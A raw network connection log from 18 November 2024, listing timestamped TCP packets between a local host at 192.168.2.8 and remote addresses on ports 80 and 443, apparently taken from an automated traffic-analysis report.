                                                                                                                                Nov 18, 2024 13:50:52.057984114 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.057991028 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.058024883 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.069880009 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.069950104 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.069988012 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.070058107 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.070363045 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.070394993 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.070410013 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.070455074 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.070885897 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.071002960 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.076729059 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.076795101 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.076925039 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.076967955 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.120397091 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.120454073 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.120470047 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.120557070 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.161138058 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.161247969 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.173952103 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.174017906 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.174086094 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.174134970 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.174176931 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.174231052 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.174612999 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.174657106 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.186943054 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.187014103 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.187139988 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.187184095 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.187267065 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.187309980 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.187604904 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.187653065 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.188007116 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.188060045 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.188086987 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.188133001 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.188551903 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.188608885 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.188641071 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.188688040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.189577103 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.189668894 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.193738937 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.193797112 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.193892956 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.193937063 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.237168074 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.237317085 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.237337112 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.237396002 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.290497065 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.290605068 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.290636063 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.290683985 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.290815115 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.290858030 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.291240931 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.291301966 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.303631067 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.303684950 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.303793907 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.303845882 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.303858042 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.303904057 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.304316044 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.304361105 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.304785967 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.304845095 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.304851055 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.304898977 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.305335999 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.305397034 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.305402994 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.305449963 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.310594082 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.310648918 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.310767889 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.310821056 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.310827017 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.310869932 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.311297894 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.311358929 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.311367989 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.311414003 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.354115009 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.354180098 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.354193926 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.354235888 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.407531023 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.407599926 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.407624960 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.407675982 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.407783031 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.407833099 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.408112049 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.408210039 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.420623064 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.420726061 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.420823097 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.420968056 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.421211004 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.421271086 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.421360016 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.421410084 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.421756983 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.421828032 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.421844006 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.421900034 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.421907902 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.421955109 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.422595978 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.422646999 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.427351952 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.427408934 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.427551985 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.427601099 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.427882910 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.427937031 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.427961111 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.428006887 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.428014994 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.428055048 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.428071976 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.428077936 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:52.428105116 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:52.428122997 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:53.574695110 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.579705954 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:53.579806089 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.580066919 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:53.584940910 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:54.414751053 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:54.421840906 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:54.426810980 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:55.665736914 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:55.714204073 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:56.126080036 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.126154900 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.126231909 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.146401882 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.146471977 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.761554956 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.761657000 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.767184973 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.767219067 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.767586946 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.779686928 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.823339939 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928498030 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928601980 CET44349714188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:56.928668022 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.934890032 CET49714443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:56.942181110 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:56.947156906 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.186085939 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.188227892 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188297033 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.188373089 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188671112 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.188683987 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.229899883 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.824489117 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.830641985 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.830698013 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975434065 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975526094 CET44349715188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.975668907 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.976141930 CET49715443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:50:59.979465008 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.980515957 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.984970093 CET8049711193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.985142946 CET4971180192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.985399008 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:59.985485077 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.985692978 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:50:59.990681887 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.820605993 CET8049716193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.821788073 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.821832895 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.821908951 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.822163105 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:00.822176933 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:00.870450020 CET4971680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.432084084 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.433840036 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.433876038 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578021049 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578089952 CET44349717188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.578161955 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.578706980 CET49717443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:01.582681894 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.587723970 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:01.587884903 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.592613935 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:01.597523928 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.421680927 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.423175097 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423227072 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.423450947 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423587084 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:02.423599958 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:02.464282036 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.029733896 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.031383991 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.031450987 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171169043 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171233892 CET44349719188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.171410084 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.171888113 CET49719443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:03.175932884 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.176616907 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181615114 CET8049718193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.181715012 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:03.181744099 CET4971880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181787968 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.181866884 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:03.186765909 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.026211023 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.027721882 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.027762890 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.027833939 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.028120995 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.028136015 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.073640108 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.642682076 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.644263029 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.644295931 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788203001 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788351059 CET44349721188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.788410902 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.789390087 CET49721443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:05.797550917 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.799194098 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.805663109 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.805753946 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.805912018 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:05.813718081 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.826493979 CET8049720193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:05.826622963 CET4972080192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:06.654702902 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.655998945 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656052113 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.656116009 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656382084 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:06.656394958 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:06.698632956 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.264532089 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.266194105 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.266236067 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409559965 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409713030 CET44349723188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.409787893 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.410135984 CET49723443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:07.414000988 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.415416956 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.419246912 CET8049722193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.419331074 CET4972280192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.420336962 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:07.420423031 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.420520067 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:07.425276041 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.265789986 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.267370939 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267415047 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.267519951 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267823935 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.267837048 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.307984114 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:09.868484020 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:09.870630980 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:09.870647907 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.009491920 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.009567022 CET44349725188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.009632111 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:10.010123014 CET49725443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:10.014183998 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:10.015472889 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:10.020752907 CET8049724193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.020836115 CET4972480192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:10.022026062 CET8049726193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.022109032 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:10.022285938 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:10.029550076 CET8049726193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.867541075 CET8049726193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.869091988 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:10.869143009 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.869298935 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:10.869554996 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:10.869569063 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:10.917476892 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.477446079 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.479115963 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:11.479140997 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.822386026 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.822455883 CET44349727188.114.97.3192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.822556019 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:11.823477983 CET49727443192.168.2.8188.114.97.3
                                                                                                                                Nov 18, 2024 13:51:11.837971926 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.838803053 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.843365908 CET8049726193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.843507051 CET4972680192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.843714952 CET8049728193.122.6.168192.168.2.8
                                                                                                                                Nov 18, 2024 13:51:11.843801022 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.848272085 CET4972880192.168.2.8193.122.6.168
                                                                                                                                Nov 18, 2024 13:51:11.853197098 CET8049728193.122.6.168192.168.2.8
